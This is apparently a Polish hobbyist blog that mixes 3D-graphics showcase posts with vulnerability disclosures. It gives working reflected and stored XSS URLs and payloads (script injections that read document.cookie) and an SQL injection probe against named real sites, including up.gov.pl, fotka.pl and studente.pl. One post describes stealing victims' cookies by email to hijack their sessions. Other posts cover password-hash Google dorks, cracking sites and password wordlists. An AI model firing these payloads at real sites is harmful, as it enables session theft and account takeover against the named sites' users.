Wallpaper - Abstract od Kir4

















WERSJA FULL HD 

http://kir4pl.deviantart.com/art/Abstract-348700799


[ViewIndex]prawo.ug.edu.pl



Poważny błąd na  prawo.ug.edu.pl w indexie można znaleźć ...






Błąd zgłoszony !

[XSS]up.gov.pl


 Błąd został zgłoszony
http://www.up.gov.pl/index.php?id=128&act=search&word=%22%3E%3Ch1%3E%3Cscript%3Edocument.write%28%27%3Cdiv+style%3D%22width%3A500px%3Bheight%3A500px%3Bposition
%3Aabsolute%3Bbackground%3Ablack%3Bcolor%3Awhite%3B+font-size%3A30%3B+padding-left%3A100px%3Bpadding-top%3A70px%3B%22%3EPozdro+by+Kir4%3C%2Fdiv%3E%27%29%3B%3C%2Fscript%3E%3C%2Fh1%3E&submit=


[XSS]FireCash.org

Cześć, wykryłem błąd na stronie znalazłem XSS, wchodzimy http://firecash.org/...site-your-sites dajemy dodaj słowo kluczowe i wpisujemy tam "><h1><script>alert(document.cookie)</script> </h1> i wyskakuję nam pełny błąd XSS coockies na wierzchu co jeszcze jedna rzecz jest dziwna ? Że jak raz dodamy ten skrypt to potem nie możemy usunąć więc niech nikt nie próbuję ten błąd jest tylko do administracji zgłaszany. Druga sprawa już troszkę ważniejsza ... gdy edytujemy gateway wypełniamy wszystkie pola "><h1><script>alert(document.cookie)</script> </h1> oprócz paru pol które.Dołączona grafika


Płatności

Dołączona grafikaDołączona grafika

Wszystkie pola są podatne na XSS


Dołączona grafika

Pozycjonowanie Strony


System Gateway

Dołączona grafika

Najgorsze to ostatni screen ! Gdy ktoś rozwiązuję gateway to wyskakuję mu komunikat z XSS wyskakują jego cookies które można łatwo przejąć.
Po prostu gdy ofiara wejdzie wypełni ankietę do mnie przychodzi email z logami i coockies i wchodzę jako jedno razowa sesja i mogę wykonać każdy ruch aż do wyloogowania albo opróżnienia coockies . Aby uniknąć problemu wystarczy włączyć filtrowanie w htmlu. Pozrawiam 

Błąd dawno zgłoszony nie wiem czy jeszcze działa  

Jak sprawdzić czy google nie indexuje naszych haseł?

Witam, otóż większość ludzi korzystająca z Google nie zna mocy Gigantycznego Wujka. 


Jak łatwo sprawdzić czy nasze hasło nie indexuje google ? Jest parę opcji które przydadzą się każdemu  ciekawskiemu.

Używamy strony http://www.md5hashgenerator.com/ i generujemy nasze hasło. Po wygenerowaniu hasła powinniśmy dostać między innymi taki hash e3afed0047b08059d0fada10f400c1e5 (Admin) oczywiście każdy będzie inny po wpisaniu różnych fraz do generatora. Gdy już nam wygenerowało tak zwany hash MD5. Wrzucamy go w google, i sprawdzamy czy google nie pokazuje nam rozkodowanego hashu jeśli masz uniwersalne hasło typu moje53hashlo421 itp i znajdzie się w googlach to prawdopodobnie Atakujący skorzystał z dostępu do twoich kont. Ważne aby zmieniać hasła na każdych forach / portalach szczególnie typu Facebook,nk,allegro ! Gdy wpisałem hash który wygenerowałem były linijki typu

e3afed0047b08059d0fada10f400c1e5:Admin
e3afed0047b08059d0fada10f400c1e5 Admin
Admin:e3afed0047b08059d0fada10f400c1e5
e3afed0047b08059d0fada10f400c1e5
admin
itp . Oczywiście iż nie każdy skrypt szyfruje w MD5 a np w SHA1 i innych tego typu Hashach.

CMS'y typu Wordpress, Joomla czy też np phpbb3 zawierają hashe z Saltem tzw solone. Dzięki takiemu saltowi łamanie haseł trwa znacznie dłużej i utrudnia crackerowi zdobycia naszego hasła.

np

Drugi przykład tak zwany " Google Dork "

Wpisujemy w google np :

url/host:nk.pl lub filetype:txt intext:naszehasło
i gdy zobaczymy podobną treść do tej lub wszystko inne co związane z naszym hasłem

Program:        Google Chrome
Url/Host:       http://www.nk.pl/
Login:         Nasz email/login
Password:      naszehaslo
Computer:      PC
Date:           2013-01-13 13:22:20
Ip:                 IP

To prawdopodobnie mamy Stealera w komputerze (lub ktoś opublikował twoje hasło np łamiąc hash md5 )Wysyła nasze logi np na email wasze hasła, loginy  do kont bankowych, facebooka itp. Więc radzę przeskanować komputer i zmienić hasła po wywaleniu tego syfu. 

Przydatne linki: 

http://www.insidepro.com/hashes.php

http://www.md5hashgenerator.com/


// Nie odpowiadam za złe użycie lub celowe wykorzystanie tego artykułu w zły sposób. Np uzyskanie danych nie do swoich kont//

Jest jeszcze wiele innych sposób zdobycia waszego hasła, ale to już w następnych artach. Pozdrawiam ;)


[TXT]Słowniki

Wrzuciłem parę słowników, każdemu może się przydać ;)


https://dazzlepod.com/site_media/txt/passwords.txt

https://github.com/tomrittervg/simple-crypto-pack/blob/master/common/simple-dictionary.txt

http://knuth.luther.edu/~bmiller/wordlist.txt

http://www.cs.ucsb.edu/~buoni/cs8/homeworks/wordlist.txt

http://cd.textfiles.com/suzybatari2/wordwork/dicwords/wordlist.txt

http://grimwepa.googlecode.com/svn-history/r68/trunk/grimwepa1.1/wordlist.txt

http://java.net/projects/opends/sources/svn/content/branches/replication-service/resource/config/wordlist.txt?rev=6678
Pozdrawiam, jeśli ktoś będzie potrzebował więcej podam dorka na gg. 
 

[XSS]chrzanow.pl


Miejski Serwis Informacyjny Chrzanowa


http://www.chrzanow.pl/index.php?id=666&%27p=firm%2C0%2Csearch&search=XSS


Błąd został zgłoszony


[XSS][SQLi] www.studente.pl

 Pierwszy błąd jest to SQLInjection :

http://studente.pl/artykul.php?id=-1321%27

Drugi błąd jest to XSS :

http://studente.pl/search.php?q=%22%3E%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%2Fh1%3E

Błędy zostały zgłoszone

[XSS] Fotka.pl / Nowa.fotka.pl

Cześć otóż trochę poszperałem i znalazłem parę ciekawych błędów.

Pierwszy :


Kod:
www.fotka.pl/szukaj zmienna miejscowosc="><h1><script>alert(document.cookie)</script></h1>

[Obrazek: rlod.jpg]

Drugi :

Kod:
www.fotka.pl/szukaj login&login="><h1><script>alert(document.cookie)</script></h1>

[Obrazek: hlqq.jpg]

Trzeci :

Kod:
http://nowa.fotka.pl/szukaj#r &miejscowosc_id=

[Obrazek: xuqt.jpg]

Czwarty bez kombinowania w POST myślałem na początku że google ma xss,a ale to wina po stronie fotki

Kod:
http://www.fotka.pl/szukaj_google.php?q=test&sa=Szukaj&sitesearch=%22%3E%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/h1%3E%2Fforum%2Fmoje_dyskusje&client=pub-2386558369721555&forid=1&channel=0970824739&ie=UTF-8&oe=UTF-8&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23FFFFFF%3BVLC%3A663399%3BAH%3Acenter ​ %3BBGC%3AFFFFFF%3BLBGC%3AFFFFFF%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT ​%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A11&hl=pl [/img]

Piaty :

[code] http://www.fotka.pl/klubgwiazd/mt zmienne phone_1= ,phone_2= ,phone_3= i f_telefon= są podatne na XSS

[Obrazek: mwmv.jpg]

[Obrazek: zudn.jpg]

[Obrazek: upum.jpg]

to chyba na tyle o ile nie pominąłem jakichś zmiennych podatnych na XSS.

% jeszcze to ale nie wiem czy będzie można to przekierować na konto po zmienieniu w zmiennych na osobę którą chcemy się zalogować + dodania coockies wykradzionych z XSS ale nie jestem pewien

[Obrazek: dfbr.jpg]

Błędy można wykorzystać/uzyskać dopiero po zalogowaniu. Pozdrawiam

Biuro w 3D




Biuro w 3D Low Poly bez użycia nurbsów

The End New York !











Jedna z lepszych prac zrobionych w tym roku.

Czas przywitać się !

Cześć i witam wszystkich, z dzisiejszym dniem założyłem pierwszy mój blog o tematyce " Grafika 3D i wszystko inne związane z grafiką " oraz " Web Security"

Na Blogu będę promował moje pracę wykonane w Photoshopie CS6 oraz Cinema 4D.

Dla ludzi interesujących się Web Security też się coś znajdzie ;] Artykuły, poradniki, i vulny różnych stron.

Kontakt :

E-mail : kir4hacked@gmail.com
GG: 40834846